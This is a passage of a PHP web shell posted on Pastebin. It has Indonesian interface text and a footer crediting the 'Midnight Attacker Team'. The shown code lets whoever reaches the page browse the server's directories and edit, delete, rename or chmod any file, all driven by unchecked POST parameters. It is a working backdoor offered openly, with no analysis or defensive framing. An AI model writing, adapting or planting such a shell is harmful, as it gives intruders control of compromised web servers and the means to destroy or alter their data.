  667. <input type="hidden" name="opt" value="rename">
  668. <input type="submit" value="Go" />
  669. </form>';
  670. }elseif($_POST['opt'] == 'edit'){
  671. if(isset($_POST['src'])){
  672. $fp = fopen($_POST['path'],'w');
  673. if(fwrite($fp,$_POST['src'])){
  674. echo '<font color="green">Berhasil Edit File</font><br/>';
  675. }else{
  676. echo '<font color="red">Gagal Edit File</font><br/>';
  677. }
  678. fclose($fp);
  679. }
  680. echo '<form method="POST">
  681. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  682. <input type="hidden" name="path" value="'.$_POST['path'].'">
  683. <input type="hidden" name="opt" value="edit">
  684. <input type="submit" value="Save" />
  685. </form>';
  686. }
  687. echo '</center>';
  688. }else{
  689. echo '</table><br/><center>';
  690. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  691. if($_POST['type'] == 'dir'){
  692. if(rmdir($_POST['path'])){
  693. echo '<font color="green">Directory Terhapus</font><br/>';
  694. }else{
  695. echo '<font color="red">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  696. }
  697. }elseif($_POST['type'] == 'file'){
  698. if(unlink($_POST['path'])){
  699. echo 'File Terhapus</font><br/>';
  700. }else{
  701. echo '<font color="red">File Gagal Dihapus</font><br/>';
  702. }
  703. }
  704. }
  705. echo '</center>';
  706. $scandir = scandir($path);
  707. echo '<div><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  708. <tr class="first">
  709. <td><center>Name</peller></center><hr></td>
  710. <td><center>Size</peller></center><hr></td>
  711. <td><center>Permission</peller></center><hr></td>
  712. <td><center>Modify</peller></center><hr></td>
  713. </tr>';
  714.  
  715. foreach($scandir as $dir){
  716. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  717. echo '<tr>
  718. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a><hr></td>
  719. <td><center>--</center></td>
  720. <td><center>';
  721. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  722. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  723. echo perms($path.'/'.$dir);
  724. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  725.  
  726. echo '</center></td>
  727. <td><center><form method="POST" action="?option&path='.$path.'">
  728. <select name="opt">
  729. <option value="">Select</option>
  730. <option value="delete">Delete</option>
  731. <option value="chmod">Chmod</option>
  732. <option value="rename">Rename</option>
  733. </select>
  734. <input type="hidden" name="type" value="dir">
  735. <input type="hidden" name="name" value="'.$dir.'">
  736. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  737. <input type="submit" value=">">
  738. </form></center></td>
  739. </tr>';
  740. }
  741. echo '<tr><td></td><td></td><td></td><td></td></tr>';
  742. foreach($scandir as $file){
  743. if(!is_file($path.'/'.$file)) continue;
  744. $size = filesize($path.'/'.$file)/1024;
  745. $size = round($size,3);
  746. if($size >= 1024){
  747. $size = round($size/1024,2).' MB';
  748. }else{
  749. $size = $size.' KB';
  750. }
  751.  
  752. echo '<tr>
  753. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  754. <td><center>'.$size.'</center></td>
  755. <td><center>';
  756. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  757. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  758. echo perms($path.'/'.$file);
  759. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  760. echo '</center></td>
  761. <td><center><form method="POST" action="?option&path='.$path.'">
  762. <select name="opt">
  763. <option value="">Select</option>
  764. <option value="delete">Delete</option>
  765. <option value="chmod">Chmod</option>
  766. <option value="rename">Rename</option>
  767. <option value="edit">Edit</option>
  768. </select>
  769. <input type="hidden" name="type" value="file">
  770. <input type="hidden" name="name" value="'.$file.'">
  771. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  772. <input type="submit" value=">">
  773. </form></center></td>
  774. </tr>';
  775. }
  776. echo '</table>
  777. </div>';
  778. }
  779. echo "<hr><center><a href='https://midnight-attacker.blogspot.com' target='_blank'><font size='3px'></a> CODED BY CIRARA-MIDNIGHT ATTACKER TEAM <a href='http://midnight-attacker.eu5.net' target='_blank'><font size='3px'></a><hr>
  780. </body>
  781. </html>";
  782. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!